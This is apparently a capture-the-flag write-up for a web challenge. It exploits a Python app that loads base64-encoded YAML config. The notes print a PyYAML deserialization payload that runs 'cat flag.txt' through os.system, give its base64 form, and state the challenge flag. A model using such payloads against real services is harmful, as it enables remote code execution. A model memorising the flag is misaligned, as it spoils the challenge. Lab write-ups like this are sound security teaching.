![Pasted image 20230324144440.png](../assets/Pasted%20image%2020230324144440.png)

![Pasted image 20230322213720.png](../assets/Pasted%20image%2020230322213720.png)

It shows Serialized config.

![Pasted image 20230322213901.png](../assets/Pasted%20image%2020230322213901.png)

It is using python as it's backend, and some kind of serialization.

By google search i found this [blog](https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1)

![Pasted image 20230322213957.png](../assets/Pasted%20image%2020230322213957.png)

````python
!!python/object/apply:os.system ["cat flag.txt"]
````

Encode this rce payload in base64

![Pasted image 20230322214211.png](../assets/Pasted%20image%2020230322214211.png)

````python
ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg==
````

![Pasted image 20230322214344.png](../assets/Pasted%20image%2020230322214344.png)

Flag: `HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}`
